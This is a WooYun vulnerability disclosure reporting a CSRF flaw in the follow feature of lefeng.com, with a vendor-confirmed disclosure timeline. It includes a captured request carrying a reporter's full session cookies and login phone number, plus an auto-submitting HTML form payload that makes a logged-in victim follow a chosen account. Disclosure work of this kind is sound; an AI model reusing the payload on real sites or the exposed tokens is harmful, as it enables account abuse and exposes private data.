当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087927

漏洞标题:乐蜂网某处CSRF刷关注

相关厂商:乐蜂网

漏洞作者: Summer

提交时间:2014-12-20 17:03

修复时间:2015-02-03 17:04

公开时间:2015-02-03 17:04

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-20: 细节已通知厂商并且等待厂商处理中
2014-12-25: 厂商已经确认,细节仅向厂商公开
2015-01-04: 细节向核心白帽子及相关领域专家公开
2015-01-14: 细节向普通白帽子公开
2015-01-24: 细节向实习白帽子公开
2015-02-03: 细节向公众公开

简要描述:

详细说明:

http://f.lefeng.com/
问题出现在关注这里
这个uid就是需要关注的id

w1.jpg


漏洞证明:

POST /weibo/follow?&u=t&lg=n&uid=49679472 HTTP/1.1
Host: f.lefeng.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://f.lefeng.com/u/49679472/fans
Cookie: WT_FPC=id=200ea5b8ff7756332ec1419002557918:lv=1419047889169:ss=1419046010273:lsv=1419002557918:vs=1:spv=55; __utma=96327937.1116324794.1419003289.1419003289.1419046965.2; __utmz=96327937.1419003289.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lvm_id=90510774674712620001419002562661; __smoc=4a2dc51917e01bd50252bd4d357e5d0d; Hm_lvt_db93c73698769fe05759abb4a4b36104=1419002565; Hm_lvt_69200f796b23f8fe027c39886c7298db=1419004959,1419005845,1419046010,1419047195; __zpspc=76.1.1419002578.1419003289.8%234%7C%7C%7C%7C%7C%23; countyId=171202; __cart_count__=1; CART_COUNTTIME=1419005867957%2420; OneTimeValuesCookies=__user_type__%240%23__user_totalbuy__%240%23__user_id__%2449669146; lafaso_login_name_as988=15754334072; newGuest=%7B%22state%22%3A8%2C%22id%22%3A%224_55_2772%22%7D; pgv_pvi=8990515200; shipInfo=0; acta=%7B%22actn%22%3A%7B%22500096%22%3A%5B%226720823703263600022%3E19%3E1419003287771%3E6%3E1419003287626%3E124137555940697161%3E1419003147068%22%2C1434555289278%5D%7D%2C%22acti%22%3A%7B%22500096%22%3A%5B%22141900313659848430%22%2C1434555136598%5D%7D%2C%22acts%22%3A%7B%22500096%22%3A%5B%225%22%2C1434555150363%5D%7D%2C%22actmapping%22%3A%7B%220%22%3A%5B1%2C1421595289280%5D%7D%7D; CHANETINFO=93269564257; aid=1200; cid2=505236; cid3=93269564257; LongTimeValuesCookies=__SSO_LOGIN%249a063f830782f35ff46434e014c4b8400b2be3a23c3adcb74c49c49ec31758246b3211d855cfeff6%23__user_id_login_2009%24a4ec0050f18dd61418004458108854bb%23__LOGIN__VIEWINFO__%24157****4072%23__LOGIN%2415754334072%23__user_id__%2449669146; uid=49669146; fxb_auth=1b1caHmH22mLsPx3rvuSmLehVMa%2BWoLBqXDymY3bH2Pnw702ejnMibTFO9f8cZc%2FJ9EaqmLolFRDulrF6hYjE5J2ibmRJnf9guGvU3FNJ9gkjv08%2FB%2FV0HINo%2BQtpHsqRZxZIwuoEUZtk1OmBOcYCI2iOqZzJsNAjntjrwHDYX0fhJB8lQZEbZfuTnwNH6by%2F4gpULP2IZ8DD54; fxb_user_info=%7B%22user_id%22%3A%2249669146%22%2C%22nickname%22%3A%22%5Cu8702%5Cu53cb69146%22%2C%22status%22%3A%221%22%2C%22role%22%3A%221%22%2C%22tags%22%3A%5Bfalse%5D%7D; __utmb=96327937.1.10.1419046965; Hm_lpvt_69200f796b23f8fe027c39886c7298db=1419047195; NTKF_CACHE_DATA=%7B%22uid%22%3Anull%2C%22tid%22%3Anull%2C%22fid%22%3A%221419047196250148%22%2C%22d%22%3A%7B%7D%7D; BIGipServerpool_drb_web=gPcn/VgJSacEXLYY2UV9Brq24c3aQ6A5UlZoc/wRPVYFKd/Vg2ozZwIk2hM40aRajLerB0IHDcgbLjI=; ordercoupon=a4ec0050f18dd61418004458108854bb
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0


<html>
<body>
<form id="demo" name="demo" action="http://f.lefeng.com/weibo/follow?&u=t&lg=n&uid=49679472" method="POST">
<input type="submit" value="submit" />
</form>
<script>
document.demo.submit();
</script>
</body>
</html>


w2.jpg


修复方案:

版权声明:转载请注明来源 Summer@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-12-25 14:36

厂商回复:

谢谢关注乐蜂网,我们尽快修复。

最新状态:

暂无


漏洞评价:

评论